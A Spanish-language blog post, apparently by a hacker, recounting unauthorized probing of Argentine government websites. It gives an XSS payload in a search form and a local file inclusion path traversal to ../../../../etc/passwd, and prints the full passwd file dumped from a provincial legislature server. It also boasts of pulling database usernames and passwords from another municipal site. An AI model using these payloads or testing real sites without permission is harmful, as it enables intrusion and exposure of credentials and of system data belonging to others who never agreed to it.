Bueno, otro día terminaba y eran casi las 2 a.m. aproximadamente, a todo esto yo estaba haciendo un recorrido por un par de paginas hasta que vi algo en una en particular que me llamo la atención, se trataba de un site de la camara de diputados/representantes de misiones (*.gov.ar).. Tenia un simple formulario de busca y me dije: ¿Por que no? Entonces, pruebo un simple XSS

“><script>alert(/XSS by C1c4Tr1Z/)</script>

Y me sorprendí al recibir esto:

Aun que con esto no podía hacer mucho, ya que no era un ataque directo, ni tenia las fuerzas necesarias XD.. Pero bueno, seguí con lo mio, después de un rato miro de nuevo la URI y veo que tiene un parámetro GET que decía así: ?donde=. Por lo que borre los datos del parámetro dándome este resultado:

Fatal error: input in flex scanner failed in /home/www/include/busquedas on line 1

Y como todo buen matemático hice esta ecuación: LFI+PaginaVulnerable=../../../../etc/passwd.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: postgres:x:40:41:PostgreSQL Server:/var/lib/pgsql:/bin/bash ftp:x:14:50:FTP User:/var/ftp: squid:x:23:23::/var/spool/squid:/dev/null gdm:x:42:42:GDM User:/var/lib/gdm: htdig:x:51:51:HTDIG User:/var/www/html/htdig: dhcpd:x:19:19:Dhcpd User:/var/dhcpd: named:x:25:25:Bind User:/var/named: postfix:x:35:35:Postfix User:/var/spool/postfix: snort:x:27:27::/var/log/snort:/dev/null nscd:x:28:28:NSCD Daemon:/:/bin/false rpm:x:37:37:RPM User:/var/lib/rpm:/bin/false apache:x:48:48:Apache User:/var/www: rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false rpc:x:32:32:Portmapper RPC user:/:/bin/false sympa:x:89:89:Sympa Mailing list manager:/var/lib/sympa:/bin/bash gica:x:90:90:Gica Account:/opt/gica:/bin/bash ldap:x:93:93:OpenLDAP server:/var/lib/ldap:/bin/false vpopmail:x:399:399:vpopmail user:/home/vpopmail:/bin/true alias:x:400:401:qmail alias user:/var/qmail/alias:/bin/true qmaild:x:401:401:qmaild user:/var/qmail:/bin/true qmaill:x:402:401:qmaill user:/var/qmail:/bin/true qmailp:x:403:401:qmailp user:/var/qmail:/bin/true qmailq:x:404:400:qmailq user:/var/qmail:/bin/true qmailr:x:405:400:qmailr user:/var/qmail:/bin/true qmails:x:406:400:qmails user:/var/qmail:/bin/true dnscache:x:410:405:dnscache user:/var/djbdns:/bin/true dnslog:x:411:405:dnslog user:/var/djbdns:/bin/true tinydns:x:412:405:tinydns user:/var/djbdns:/bin/true axfrdns:x:413:405:axfrdns user:/var/djbdns:/bin/true nobody:x:65534:65534:Nobody:/home:/bin/sh xfs:x:414:414:X Font Server:/etc/X11/fs:/bin/false mysql:x:415:415:MySQL server:/var/lib/mysql:/bin/bash admin:x:501:501:admin:/home/admin:/bin/bash www:x:502:48:www:/home/www:/bin/bash webcam:x:503:503::/home/www/webcam:/bin/bash

Pero después de esto y de un bug que tenia un impacto mayor, decidí dejarlo a la fortuna y seguir con mi paseo en búsqueda de sitios gubernamentales que tengan vulnerabilidades XSS:

Pero, estos son simples ataques que cualquiera podría hacer, a diferencia de lo que encontré en otra web, de Rio Cuarto, donde pude conseguir passwords y usuarios de sus bases de datos, además de algunas otras informaciones..

A que quiero llegar con esto? Que nunca hay seguridad suficiente, ni en usuarios comunes y corrientes como todos nosotros (supongo..) ni en agentes gubernamentales ni en empresas multinacionales ni mucho menos, sin mencionar sus grandes gastos en seguridad informática que les aportan una protección “extra” gracias a sus grandes sumas de dinero y posibilidades. Tomo el caso de una de las webs que encotre vulnerables, en ella pude encontrar SQL Injection (a muy bajo nivel) y XSS, pero me sorprendi al ver que estaba checkeada por un sistema de seguridad por una empresa como es la de McAfee, entendiendo por fin, en 1º persona, un articulo sobre el tema . A veces se pueden pasar algun tipo de XSS cuando se esta desarrollando el code de la web, pero cuando es tan absurdo y voraz en una web que pertenece al gobierno con el que convivimos y con intereses en seguridad informatica solo se puede decir: WTF?!